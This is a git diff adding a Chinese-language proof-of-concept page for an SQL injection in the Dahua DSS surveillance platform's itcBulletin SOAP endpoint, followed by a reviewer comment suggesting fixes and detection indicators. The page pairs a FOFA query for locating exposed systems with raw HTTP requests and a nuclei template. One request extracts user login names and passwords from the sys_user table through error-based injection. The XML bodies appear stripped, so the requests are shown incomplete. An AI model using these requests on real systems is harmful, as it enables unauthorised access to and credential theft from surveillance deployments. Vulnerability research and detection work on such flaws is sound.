diff --git a/大华DSS itcBulletin SQL 注入漏洞.md b/大华DSS itcBulletin SQL 注入漏洞.md
new file mode 100644
index 0000000..33e11de
--- /dev/null
+++ b/大华DSS itcBulletin SQL 注入漏洞.md
@@ -0,0 +1,80 @@
+## 大华DSS itcBulletin SQL 注入漏洞
+大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。
+
+## fofa
+```
+app="dahua-DSS"
+```
+
+## poc
+```
+POST /portal/services/itcBulletin?wsdl HTTP/1.1
+Host: x.x.x.x
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Connection: close
+Content-Length: 345
+Accept-Encoding: gzip
+
+
+
+
+
+ (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
+
+
+
+
+
+
+POST /portal/services/itcBulletin?wsdl HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip
+
+
+
+
+
+ (updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1
+
+
+
+
+
+```
+
+## nuclei poc
+```
+id: dahua-dss-itcBulletin-sqli
+info:
+ name: 大华DSS itcBulletin SQL注入漏洞
+ author: fgz
+ severity: high
+ description: 大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。
+ metadata:
+ fofa-query: app="dahua-DSS"
+
+requests:
+ - raw:
+ - |+
+ POST /portal/services/itcBulletin?wsdl HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+
+
+
+
+
+ (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
+
+
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code==500 && contains(body,"error code [1105]") && contains(body,"6cfe798ba8e5b85feb50164c59f4bec")'
+```
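Review bot: The write-up stops at the `## nuclei poc` section and never names the affected DSS versions, a vendor fix, or any step an operator can take, so a reader who gets a match has nothing to act on. I would add a closing `## 修复建议` section that says to restrict `/portal/services/` to the management network, apply the vendor update (version not stated on this page), and treat the `sys_user` credentials as exposed and rotate them if the probe matched. The page already holds the indicators a detection rule needs, and they deserve their own line: a POST to `/portal/services/itcBulletin` whose body contains `updatexml(`, answered with HTTP 500 and `error code [1105]`. Separately, the template fence has no `yaml` tag and its nesting appears flattened to one space as shown here, so confirm the committed file still parses.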